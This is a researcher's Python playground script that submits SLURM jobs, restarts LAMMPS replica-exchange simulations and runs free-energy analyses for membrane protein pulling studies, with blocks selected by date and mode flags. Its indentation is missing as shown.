from small_script.myFunctions import compute_theta_for_each_helix
from small_script.myFunctions import *
from small_script.myFunctions import make_metadata
# Useful codes
# os.system("awk '{print $NF}' all_wham.dat > e_total")
# tr " " "\n"
# sed 1d
# sort -u -k 3
# sed -e 's/+T//'
# import re
# numbers = re.compile(r'(\d+)')
# def numericalSort(value):
# parts = numbers.split(value)
# parts[1::2] = map(int, parts[1::2])
# return parts
# mypath = os.environ["PATH"]
# os.environ["PATH"] = "/home/wl45/python/bin:/home/wl45/opt:" + mypath
# my_env = os.environ.copy()
parser = argparse.ArgumentParser(description="This is my playground for current project")
parser.add_argument("-r", "--run", help="test mode",
action="store_true")
parser.add_argument("-s", "--see", help="test mode",
action="store_true")
# parser.add_argument("-d", "--debug", action="store_true", default=False)
parser.add_argument("-m", "--mode", type=int, default=0)
parser.add_argument("-d", "--day", type=str, default="someday")
parser.add_argument("-t", "--test", action="store_true", default=False)
args = parser.parse_args()
if args.test:
do = print
else:
do = os.system
cd = os.chdir
base_slurm = '''\
#!/bin/bash
#SBATCH --job-name=CTBP_WL
#SBATCH --account=ctbp-common
#SBATCH --partition=ctbp-common
#SBATCH --ntasks=1
#SBATCH --threads-per-core=1
#SBATCH --mem-per-cpu=1G
#SBATCH --time=01:00:00
#SBATCH --mail-user=luwei0917@gmail.com
#SBATCH --mail-type=FAIL
echo "My job ran on:"
echo $SLURM_NODELIST
srun {}\n'''
def replace(TARGET, FROM, TO):
do("sed -i.bak 's/{}/{}/g' {}".format(FROM,TO,TARGET))
def getFromTerminal(CMD):
return subprocess.Popen(CMD,stdout=subprocess.PIPE,shell=True).communicate()[0].decode()
def continueRunConvertion(n=12, rerun=0):
rerun_plus_one = rerun + 1
do(f"cp 2xov_0.in 2xov_{rerun_plus_one}.in")
fileName = f"2xov_{rerun_plus_one}.in"
replace(fileName, "variable r world "+ " ".join(str(i) for i in list(range(n))), "")
replace(fileName, "# read_restart restart.25000000", "variable r world "+ " ".join(str(i) for i in list(range(n))))
initial_steps = 20000000 * rerun_plus_one
replace(fileName, "read_restart restart.extended", f"read_restart restart.$r.{initial_steps}")
replace(fileName, "read_restart restart.native_topology", f"read_restart restart.$r.{initial_steps}")
replace(fileName, "0\/", f"{rerun_plus_one}\/")
cmd = 'tail -n 1 log.lammps | cut -d" " -f2-'
line = getFromTerminal(cmd).rstrip()
replace(fileName, "reset_timestep 0", "variable w world " + line)
replace(fileName, "fix xbias all colvars colvars.x output x", "fix xbias all colvars colvars.x output x.$r")
cmd = f'grep "temper" 2xov_{rerun_plus_one}.in'
line = getFromTerminal(cmd).rstrip()
replace(fileName, line, line + " $w")
def scancel_jobs_in_folder(folder):
cd(folder)
cmd = "find -name 'slurm-*' | rev | awk -F'[-.]' '{print $2}' | rev"
lines = getFromTerminal(cmd).splitlines()
for line in lines:
print(line)
do("scancel " + line)
cd("..")
quick_slurm = '''#!/bin/bash
#SBATCH --job-name=CTBP_WL
#SBATCH --account=ctbp-common
#SBATCH --partition=ctbp-common
#SBATCH --ntasks=1
#SBATCH --mem-per-cpu=1G
#SBATCH --time=00:30:00
#SBATCH --mail-user=luwei0917@gmail.com
#SBATCH --mail-type=FAIL
echo "My job ran on:"
echo $SLURM_NODELIST
srun python3 ~/opt/davinci_gg.py -d mar13 -m 5
'''
localQ_slurm = '''#!/bin/bash
#SBATCH --job-name=CTBP_WL
#SBATCH --account=ctbp-common
#SBATCH --partition=ctbp-common
#SBATCH --ntasks=1
#SBATCH --mem-per-cpu=1G
#SBATCH --time=00:30:00
#SBATCH --mail-user=luwei0917@gmail.com
#SBATCH --mail-type=FAIL
echo "My job ran on:"
echo $SLURM_NODELIST
srun python3 ~/opt/davinci_gg.py -d mar13 -m 3
'''
if args.day == "mar13":
if args.mode == 7:
bias = "dis"
simulation_list = glob.glob(f"{bias}_*")
# simulation_list = ['dis_86.0', 'dis_84.0', 'dis_76.0', 'dis_72.0', 'dis_54.0', 'dis_70.0', 'dis_50.0', 'dis_56.0', 'dis_80.0', 'dis_30.0', 'dis_88.0', 'dis_44.0', 'dis_46.0', 'dis_96.0', 'dis_38.0']
print(simulation_list)
for dis in simulation_list:
print(dis)
cd(dis)
i = 1
i_plus_one = i +1
# do(f"mkdir -p log{i}")
# do(f"mv log.* log{i}/")
# do(f"cp log{i}/log.lammps .")
# do(f"cp x.* log{i}/")
continueRunConvertion(n=12, rerun=i)
do(f"mkdir {i_plus_one}")
do(f"sed 's/2xov_{i}/2xov_{i_plus_one}/g' run_{i}.slurm > run_{i_plus_one}.slurm")
do(f"sbatch run_{i_plus_one}.slurm")
cd("..")
if args.mode == 6:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10", "1d_z":"12", "2d_z_qw":"13", "2d_z_dis":"14"}
data_folder = "all_data_folder/"
freeEnergy_folder = f"third_combined_expectedDistance_freeEnergy/"
print(freeEnergy_folder)
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
# folder_list = ["rerun_1_08_Mar_154259"]
# folder_list = [f"first_rerun_{sample_range_mode}_12_Mar_151630" for i in range(4,6)]
# folder_list = [f"second_rerun_{i}_12_Mar_211030" for i in range(2,4)]
folder_list = [f"third_rerun_{i}_14_Mar_015209" for i in range(2,4)]
# submode_list = ["_no_energy"]
# submode_list = ["", "only_500"]
# submode_list = ["350", "400", "450", "500", "550"]
temp_dic = {"_350-550":["350", "400", "450", "500", "550"]}
for temp_mode, temp_list in temp_dic.items():
move_data4(data_folder, freeEnergy_folder, folder_list, sample_range_mode=-2, sub_mode_name=temp_mode, average_z=2, chosen_mode=0)
cd(freeEnergy_folder)
for temp_mode, temp_list in temp_dic.items():
cd(temp_mode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
make_metadata_3(temps_list=temp_list,k=0.02, i=-2)
nsample = len(folder_list)*2500
do(f"python3 ~/opt/pulling_analysis_2.py -m {mode} --commons 0 --nsample {nsample} --submode 2")
cd("..")
cd("..")
cd("..")
if args.mode ==5:
for i in range(12):
compute_average_z_2(f"dump.lammpstrj.{i}", f"z_complete_{i}.dat")
if args.mode == 4:
print("compute localQ")
# print(native_contacts_table)
# cd("simulation")
bias = "dis"
simulation_list = glob.glob(f"{bias}_*")
# sim_list = ["0"]
sim_list = ["0", "1"]
for sim in sim_list:
for folder in simulation_list:
cd(folder)
cd(sim)
print(folder)
with open("localQ.slurm", "w") as f:
f.write(localQ_slurm)
# f.write(localQ_slurm.replace("ctbp-common", "commons"))
do("sbatch localQ.slurm")
cd("../..")
if args.mode == 3:
native_contacts_table = compute_localQ_init()
for i in range(12):
compute_localQ(native_contacts_table, pre=".", ii=i)
if args.mode == 2:
bias = "dis"
simulation_list = glob.glob(f"{bias}_*")
sim_list = ["0", "1"]
for sim in sim_list:
for folder in simulation_list:
cd(folder)
cd(sim)
print(folder)
with open("computeZ.slurm", "w") as f:
f.write(quick_slurm)
# f.write(quick_slurm.replace("ctbp-common", "commons"))
do("sbatch computeZ.slurm")
cd("../..")
if args.mode == 1:
pre = "/scratch/wl45/"
data_folder = "/scratch/wl45/all_data_folder/"
folder_list = ["rg_0.1_lipid_1.0_mem_1"]
# folder_list = ["23oct/memb_3_rg_0.1_lipid_1_extended"]
# folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended",
# "rgWidth_memb_3_rg_0.1_lipid_1_topology",
# "expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
process_complete_temper_data_3(pre, data_folder, folder_list, rerun=1, average_z=True, localQ=True, label="third_")
if args.day == "mar09":
if args.mode == 1:
bias = "dis"
simulation_list = glob.glob(f"{bias}_*")
# simulation_list = ['dis_86.0', 'dis_84.0', 'dis_76.0', 'dis_72.0', 'dis_54.0', 'dis_70.0', 'dis_50.0', 'dis_56.0', 'dis_80.0', 'dis_30.0', 'dis_88.0', 'dis_44.0', 'dis_46.0', 'dis_96.0', 'dis_38.0']
print(simulation_list)
for dis in simulation_list:
print(dis)
cd(dis)
i = 0
i_plus_one = i +1
do(f"mkdir -p log{i}")
do(f"mv log.* log{i}/")
do(f"cp log{i}/log.lammps .")
do(f"cp x.* log{i}/")
continueRunConvertion(n=12, rerun=i)
do(f"mkdir {i_plus_one}")
do(f"sed 's/2xov_{i}/2xov_{i_plus_one}/g' run_{i}.slurm > run_{i_plus_one}.slurm")
do(f"sbatch run_{i_plus_one}.slurm")
cd("..")
if args.day == "mar05":
if args.mode == 1:
print("cp data files.")
protein_list = ["T0766", "1mba", "T0784", "T0792", "T0803", "T0815", "T0833", "T0251"]
for protein in protein_list:
# cmd = f"cp -r /work/cms16/xl23/shared/IAAWSEM/MC_DATA_28Feb2018/{protein}/AWSEM_energy/AWSEM_energy.log {protein}_awsem.log"
cmd = f"cp /work/cms16/xl23/shared/IAAWSEM/AWSEM_HO_Results/protein_pool/02282018/{protein.lower()}/iter/post-processing/noCST/qw/pca/lowTstructure/Qw.short.out {protein}_qw.txt"
do(cmd)
cmd = f"cp /work/cms16/xl23/shared/IAAWSEM/AWSEM_HO_Results/protein_pool/02282018/{protein.lower()}/iter/post-processing/noCST/qw/pca/lowTstructure/rmsd-angstrom.short.xvg {protein}_rmsd.txt"
do(cmd)
if args.day == "mar03":
if args.mode == 1:
print("cp data files.")
protein_list = ["T0766", "1mba", "T0784", "T0792", "T0803", "T0815", "T0833", "T0251"]
for protein in protein_list:
# cmd = f"cp -r /work/cms16/xl23/shared/IAAWSEM/MC_DATA_28Feb2018/{protein}/AWSEM_energy/AWSEM_energy.log {protein}_awsem.log"
cmd = f"cp /work/cms16/xl23/shared/IAAWSEM/AWSEM_HO_Results/protein_pool/02282018/{protein.lower()}/iter/post-processing/noCST/qw/pca/lowTstructure/rwplusScore.short.txt {protein}_rw.txt"
do(cmd)
if args.mode == 2:
a = pd.read_csv("/scratch/wl45/structure_selector_mar03/old_best_by_prediction.csv")
a = a.assign(index=a.Step-1)
for name, data in a.groupby("Name"):
if name == "T0251":
nn = "T251"
else:
nn = name
print(name)
do(f"mkdir {name}")
# print(data["index"])
for i in data["index"]:
do(f"cp /work/cms16/xl23/shared/IAAWSEM/MC_DATA_24Aug/{nn.upper()}/lowTstructure/lowTstructure{i}.pdb {name}/chosen_{i}.pdb")
if args.mode == 3:
a = pd.read_csv("/scratch/wl45/structure_selector_mar03/best_by_prediction_correction.csv")
# a = a.assign(index=a.Step-1)
for name, data in a.groupby("Name"):
if name == "T0251":
nn = "T251"
else:
nn = name
print(name)
do(f"mkdir {name}")
# print(data["index"])
for i in data["index"]:
do(f"cp /work/cms16/xl23/shared/IAAWSEM/MC_DATA_28Feb2018/{nn}/lowTstructure/lowTstructure{i}.pdb {name}/pca_chosen_{i}.pdb")
if args.mode == 4:
a = pd.read_csv("/scratch/wl45/structure_selector_mar03/best_by_prediction_based_on_new.csv")
# a = a.assign(index=a.Step-1)
for name, data in a.groupby("Name"):
if name == "1MBA":
nn = "1mba"
else:
nn = name
print(name)
do(f"mkdir {name}_new")
# print(data["index"])
for i in data["index"]:
do(f"cp /work/cms16/xl23/shared/IAAWSEM/MC_DATA_28Feb2018/{nn}/lowTstructure/lowTstructure{i}.pdb {name}_new/pca_chosen_{i}.pdb")
if args.day == "mar01":
if args.mode == 1:
cd("simulation")
bias = "dis"
simulation_list = glob.glob(f"{bias}_*")
sim_list = ["0", "1"]
for sim in sim_list:
for folder in simulation_list:
cd(folder)
cd(sim)
print(folder)
with open("computeZ.slurm", "w") as f:
f.write(quick_slurm)
# f.write(quick_slurm.replace("ctbp-common", "commons"))
do("sbatch computeZ.slurm")
cd("../..")
if args.mode ==2:
for i in range(12):
compute_average_z(f"dump.lammpstrj.{i}", f"z_{i}.dat")
if args.mode == 3:
pre = "/scratch/wl45/"
data_folder = "/scratch/wl45//all_data_folder/"
folder_list = ["rg_0.2_lipid_1.0_mem_1"]
# folder_list = ["23oct/memb_3_rg_0.1_lipid_1_extended"]
# folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended",
# "rgWidth_memb_3_rg_0.1_lipid_1_topology",
# "expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
process_complete_temper_data(pre, data_folder, folder_list, rerun=1, average_z=True)
if args.mode == 4:
simulation_list = glob.glob("dis_*")
print(simulation_list)
for dis in simulation_list:
print(dis)
cd(dis)
i = 1
i_plus_one = i +1
do(f"mkdir -p log{i}")
do(f"mv log.* log{i}/")
do(f"cp log{i}/log.lammps .")
do(f"cp x.* log{i}/")
# continueRunConvertion(n=12, rerun=i)
# do(f"mkdir {i_plus_one}")
# run_slurm = base_run_slurm.format(i_plus_one)
# with open(f"run_{i_plus_one}.slurm", "w") as r:
# r.write(run_slurm)
# do(f"sbatch run_{i_plus_one}.slurm")
# do(f"sed 's/2xov_{i}/2xov_{i_plus_one}/g' run_{i}.slurm > run_{i_plus_one}.slurm")
# do(f"sbatch run_{i_plus_one}.slurm")
cd("..")
if args.mode == 5:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10", "1d_z":"12", "2d_z_qw":"13", "2d_z_dis":"14"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"freeEnergy_rg_0.1_lipid_1.0_mem_1_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["rg_0.2_lipid_1.0_mem_1"]
# submode_list = ["_no_energy"]
# submode_list = ["", "only_500"]
# submode_list = ["350", "400", "450", "500", "550"]
temp_dic = {"_350-550":["350", "400", "450", "500", "550"]}
for temp_mode, temp_list in temp_dic.items():
for folder in folder_list:
move_data2(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=temp_mode, average_z=True)
cd(freeEnergy_folder)
for temp_mode, temp_list in temp_dic.items():
for folder in folder_list:
cd(folder+temp_mode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
make_metadata(temps_list=temp_list,k=0.02)
do("pulling_analysis.py -m {} --commons 0 --nsample 2500 --submode 5".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "dec03":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"dec02_no_side_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["no_side_contraint_memb_3_rg_0.4_lipid_0.6_extended"]
# submode_list = ["_no_energy"]
# submode_list = ["", "only_500"]
# submode_list = ["350", "400", "450", "500", "550"]
temp_dic = {"_350-550":["350", "400", "450", "500", "550"]}
for temp_mode, temp_list in temp_dic.items():
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=temp_mode)
cd(freeEnergy_folder)
for temp_mode, temp_list in temp_dic.items():
for folder in folder_list:
cd(folder+temp_mode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
make_metadata(temps_list=temp_list,k=0.02)
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "dec02":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"dec02_no_side_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["no_side_contraint_memb_3_rg_0.4_lipid_0.6_extended"]
# submode_list = ["_no_energy"]
# submode_list = ["", "only_500"]
submode_list = ["350", "400", "450", "500", "550"]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode)
cd(freeEnergy_folder)
for submode in submode_list:
for folder in folder_list:
cd(folder+submode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
make_metadata(temps_list=[submode],k=0.02)
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov29":
if args.mode == 3:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"nov29_no_side_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["no_side_contraint_memb_3_rg_0.4_lipid_0.6_extended"]
# submode_list = ["_no_energy"]
submode_list = ["", "only_500"]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode)
cd(freeEnergy_folder)
for submode in submode_list:
for folder in folder_list:
cd(folder+submode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "only_500":
make_metadata(temps_list=[500],k=0.02)
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "_no_energy":
do("make_metadata.py -m 18 -k 0.05")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 21")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.mode == 2:
make_metadata(temps_list=[400])
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"15", "1d_dis":"14", "1d_qw":"13"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"nov29_q_bias_temper_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["q_bias_temper_new"]
# submode_list = ["_no_energy"]
submode_list = [""]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode, bias="qbias")
cd(freeEnergy_folder)
for submode in submode_list:
for folder in folder_list:
cd(folder+submode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "_no_energy":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "":
do("make_metadata.py -m 18 -k 1000")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 21")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov28":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(1):
freeEnergy_folder = f"nov28_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["bias_0.05_memb_3_rg_0.4_lipid_0.6_extended"]
# submode_list = ["_no_energy"]
submode_list = [""]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode)
cd(freeEnergy_folder)
for submode in submode_list:
for folder in folder_list:
cd(folder+submode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "_no_energy":
do("make_metadata.py -m 18 -k 0.05")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "":
do("make_metadata.py -m 18 -k 0.05")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 21")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov27":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"15", "1d_dis":"14", "1d_qw":"13"}
data_folder = "all_data_folder/"
for sample_range_mode in range(1):
freeEnergy_folder = f"q_bias_temper_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["q_bias_temper_new"]
# submode_list = ["_no_energy"]
submode_list = [""]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode, bias="qbias")
cd(freeEnergy_folder)
for submode in submode_list:
for folder in folder_list:
cd(folder+submode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "_no_energy":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "":
do("make_metadata.py -m 18 -k 1000")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 21")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov21":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(1):
freeEnergy_folder = f"no_side_contraint_memb_3_rg_0.4_lipid_0.6_extended_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["no_side_contraint_memb_3_rg_0.4_lipid_0.6_extended"]
# submode_list = ["_no_energy"]
submode_list = [""]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode)
cd(freeEnergy_folder)
for submode in submode_list:
for folder in folder_list:
cd(folder+submode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "_no_energy":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 21")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov19":
if args.mode == 2:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"nov_18_all_freeEnergy_calculation_sample_range_mode_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["new_next_gen_native_based_memb_3_rg_0.4_lipid_0.6_extended"]
submode_list = ["_no_energy"]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode)
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"nov_18_all_freeEnergy_calculation_sample_range_mode_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["new_next_gen_native_based_memb_3_rg_0.4_lipid_0.6_extended"]
submode_list = ["short"]
for submode in submode_list:
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode, sub_mode_name=submode)
cd(freeEnergy_folder)
for submode in submode_list:
for folder in folder_list:
cd(folder+submode)
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 21")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov18":
if args.mode == 1:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"nov_18_all_freeEnergy_calculation_sample_range_mode_{sample_range_mode}/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["new_next_gen_native_based_memb_3_rg_0.4_lipid_0.6_extended"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 19")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.mode == 2:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
for sample_range_mode in range(3):
freeEnergy_folder = f"nov_18_all_freeEnergy_calculation_sample_range_mode_{sample_range_mode}_2/"
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["new_next_gen_native_based_memb_3_rg_0.4_lipid_0.6_extended"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=sample_range_mode)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
for temp in temp_list:
if submode == "":
do("make_metadata.py -m 18 -k 0.02")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 2".format(mode))
if submode == "short":
do("make_metadata.py -m 19")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 3".format(mode))
elif submode == "low_t_":
do("make_metadata.py -m 20")
do("pulling_analysis.py -m {} --commons 1 --nsample 2500 --submode 4".format(mode))
cd("..")
cd("..")
cd("..")
if args.day == "nov15":
if args.mode == 2:
temp_list = ["all"]
bias_list = {"2d_qw_dis":"11", "1d_dis":"9", "1d_qw":"10"}
data_folder = "all_data_folder/"
freeEnergy_folder = "nov_15_all_freeEnergy_calculation/"
# do("mkdir " + freeEnergy_folder)
# folder_list = ["memb_3_rg_0.1_lipid_1_extended"]
# folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended",
# "rgWidth_memb_3_rg_0.1_lipid_1_topology",
# "expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended",
# "next_gen_native_based_memb_3_rg_0.2_lipid_0.6_extended",
# "next_gen_native_based_memb_3_rg_0.4_lipid_0.6_extended",
# "next_gen_native_based_memb_3_rg_0.4_lipid_0.6_topology",
# "stronger_bias_for_expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
# folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_extended"]
folder_list = ["rgWidth_memb_3_rg_0.1_lipid_1_topology",
"expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended",
"next_gen_native_based_memb_3_rg_0.2_lipid_0.6_extended",
"next_gen_native_based_memb_3_rg_0.4_lipid_0.6_extended",
"next_gen_native_based_memb_3_rg_0.4_lipid_0.6_topology",
"stronger_bias_for_expand_distance_rgWidth_memb_3_rg_0.1_lipid_1_extended"]
for folder in folder_list:
move_data(data_folder, freeEnergy_folder, folder, sample_range_mode=0)
submode_list = [""]
cd(freeEnergy_folder)
for folder in folder_list:
cd(folder)
for submode in submode_list:
for bias, mode in bias_list.items():
# name = "low_t_" + bias
name = submode+bias
print(name)
do("rm -r "+name)
do("mkdir -p " + name)
cd(name)
